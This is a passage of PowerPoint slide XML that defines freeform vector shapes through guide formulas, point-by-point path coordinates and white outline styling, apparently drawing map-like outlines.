                  <a:gd name="T98" fmla="*/ 85 w 466"/>
                  <a:gd name="T99" fmla="*/ 211 h 640"/>
                  <a:gd name="T100" fmla="*/ 24 w 466"/>
                  <a:gd name="T101" fmla="*/ 249 h 640"/>
                  <a:gd name="T102" fmla="*/ 17 w 466"/>
                  <a:gd name="T103" fmla="*/ 206 h 64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466"/>
                  <a:gd name="T157" fmla="*/ 0 h 640"/>
                  <a:gd name="T158" fmla="*/ 466 w 466"/>
                  <a:gd name="T159" fmla="*/ 640 h 640"/>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466" h="640">
                    <a:moveTo>
                      <a:pt x="16" y="206"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36234" name="Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1357" y="1543"/>
                <a:ext cx="110" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 110"/>
                  <a:gd name="T1" fmla="*/ 99 h 99"/>
                  <a:gd name="T2" fmla="*/ 26 w 110"/>
                  <a:gd name="T3" fmla="*/ 99 h 99"/>
                  <a:gd name="T4" fmla="*/ 26 w 110"/>
                  <a:gd name="T5" fmla="*/ 85 h 99"/>
                  <a:gd name="T6" fmla="*/ 24 w 110"/>
                  <a:gd name="T7" fmla="*/ 79 h 99"/>
                  <a:gd name="T8" fmla="*/ 17 w 110"/>
                  <a:gd name="T9" fmla="*/ 82 h 99"/>
                  <a:gd name="T10" fmla="*/ 0 w 110"/>
                  <a:gd name="T11" fmla="*/ 87 h 99"/>
                  <a:gd name="T12" fmla="*/ 1 w 110"/>
                  <a:gd name="T13" fmla="*/ 79 h 99"/>
                  <a:gd name="T14" fmla="*/ 5 w 110"/>
                  <a:gd name="T15" fmla="*/ 74 h 99"/>
                  <a:gd name="T16" fmla="*/ 16 w 110"/>
                  <a:gd name="T17" fmla="*/ 65 h 99"/>
                  <a:gd name="T18" fmla="*/ 14 w 110"/>
                  <a:gd name="T19" fmla="*/ 57 h 99"/>
                  <a:gd name="T20" fmla="*/ 14 w 110"/>
                  <a:gd name="T21" fmla="*/ 50 h 99"/>
                  <a:gd name="T22" fmla="*/ 14 w 110"/>
                  <a:gd name="T23" fmla="*/ 43 h 99"/>
                  <a:gd name="T24" fmla="*/ 17 w 110"/>
                  <a:gd name="T25" fmla="*/ 29 h 99"/>
                  <a:gd name="T26" fmla="*/ 20 w 110"/>
                  <a:gd name="T27" fmla="*/ 20 h 99"/>
                  <a:gd name="T28" fmla="*/ 22 w 110"/>
                  <a:gd name="T29" fmla="*/ 9 h 99"/>
                  <a:gd name="T30" fmla="*/ 24 w 110"/>
                  <a:gd name="T31" fmla="*/ 0 h 99"/>
                  <a:gd name="T32" fmla="*/ 32 w 110"/>
                  <a:gd name="T33" fmla="*/ 10 h 99"/>
                  <a:gd name="T34" fmla="*/ 30 w 110"/>
                  <a:gd name="T35" fmla="*/ 19 h 99"/>
                  <a:gd name="T36" fmla="*/ 36 w 110"/>
                  <a:gd name="T37" fmla="*/ 26 h 99"/>
                  <a:gd name="T38" fmla="*/ 39 w 110"/>
                  <a:gd name="T39" fmla="*/ 27 h 99"/>
                  <a:gd name="T40" fmla="*/ 42 w 110"/>
                  <a:gd name="T41" fmla="*/ 19 h 99"/>
                  <a:gd name="T42" fmla="*/ 47 w 110"/>
                  <a:gd name="T43" fmla="*/ 20 h 99"/>
                  <a:gd name="T44" fmla="*/ 53 w 110"/>
                  <a:gd name="T45" fmla="*/ 25 h 99"/>
                  <a:gd name="T46" fmla="*/ 60 w 110"/>
                  <a:gd name="T47" fmla="*/ 34 h 99"/>
                  <a:gd name="T48" fmla="*/ 64 w 110"/>
                  <a:gd name="T49" fmla="*/ 38 h 99"/>
                  <a:gd name="T50" fmla="*/ 79 w 110"/>
                  <a:gd name="T51" fmla="*/ 47 h 99"/>
                  <a:gd name="T52" fmla="*/ 82 w 110"/>
                  <a:gd name="T53" fmla="*/ 51 h 99"/>
                  <a:gd name="T54" fmla="*/ 84 w 110"/>
                  <a:gd name="T55" fmla="*/ 55 h 99"/>
                  <a:gd name="T56" fmla="*/ 83 w 110"/>
                  <a:gd name="T57" fmla="*/ 71 h 99"/>
                  <a:gd name="T58" fmla="*/ 87 w 110"/>
                  <a:gd name="T59" fmla="*/ 71 h 99"/>
                  <a:gd name="T60" fmla="*/ 91 w 110"/>
                  <a:gd name="T61" fmla="*/ 70 h 99"/>
                  <a:gd name="T62" fmla="*/ 98 w 110"/>
                  <a:gd name="T63" fmla="*/ 71 h 99"/>
                  <a:gd name="T64" fmla="*/ 103 w 110"/>
                  <a:gd name="T65" fmla="*/ 73 h 99"/>
                  <a:gd name="T66" fmla="*/ 110 w 110"/>
                  <a:gd name="T67" fmla="*/ 80 h 99"/>
                  <a:gd name="T68" fmla="*/ 107 w 110"/>
                  <a:gd name="T69" fmla="*/ 82 h 99"/>
                  <a:gd name="T70" fmla="*/ 105 w 110"/>
                  <a:gd name="T71" fmla="*/ 84 h 99"/>
                  <a:gd name="T72" fmla="*/ 102 w 110"/>
                  <a:gd name="T73" fmla="*/ 88 h 99"/>
                  <a:gd name="T74" fmla="*/ 95 w 110"/>
                  <a:gd name="T75" fmla="*/ 87 h 99"/>
                  <a:gd name="T76" fmla="*/ 90 w 110"/>
                  <a:gd name="T77" fmla="*/ 85 h 99"/>
                  <a:gd name="T78" fmla="*/ 81 w 110"/>
                  <a:gd name="T79" fmla="*/ 83 h 99"/>
                  <a:gd name="T80" fmla="*/ 78 w 110"/>
                  <a:gd name="T81" fmla="*/ 81 h 99"/>
                  <a:gd name="T82" fmla="*/ 73 w 110"/>
                  <a:gd name="T83" fmla="*/ 72 h 99"/>
                  <a:gd name="T84" fmla="*/ 69 w 110"/>
                  <a:gd name="T85" fmla="*/ 67 h 99"/>
                  <a:gd name="T86" fmla="*/ 62 w 110"/>
                  <a:gd name="T87" fmla="*/ 64 h 99"/>
                  <a:gd name="T88" fmla="*/ 58 w 110"/>
                  <a:gd name="T89" fmla="*/ 64 h 99"/>
                  <a:gd name="T90" fmla="*/ 57 w 110"/>
                  <a:gd name="T91" fmla="*/ 68 h 99"/>
                  <a:gd name="T92" fmla="*/ 58 w 110"/>
                  <a:gd name="T93" fmla="*/ 78 h 99"/>
                  <a:gd name="T94" fmla="*/ 57 w 110"/>
                  <a:gd name="T95" fmla="*/ 79 h 99"/>
                  <a:gd name="T96" fmla="*/ 48 w 110"/>
                  <a:gd name="T97" fmla="*/ 82 h 99"/>
                  <a:gd name="T98" fmla="*/ 43 w 110"/>
                  <a:gd name="T99" fmla="*/ 90 h 99"/>
                  <a:gd name="T100" fmla="*/ 39 w 110"/>
                  <a:gd name="T101" fmla="*/ 95 h 99"/>
                  <a:gd name="T102" fmla="*/ 31 w 110"/>
                  <a:gd name="T103" fmla="*/ 99 h 99"/>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10"/>
                  <a:gd name="T157" fmla="*/ 0 h 99"/>
                  <a:gd name="T158" fmla="*/ 110 w 110"/>
                  <a:gd name="T159" fmla="*/ 99 h 99"/>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10" h="99">
                    <a:moveTo>
                      <a:pt x="31" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
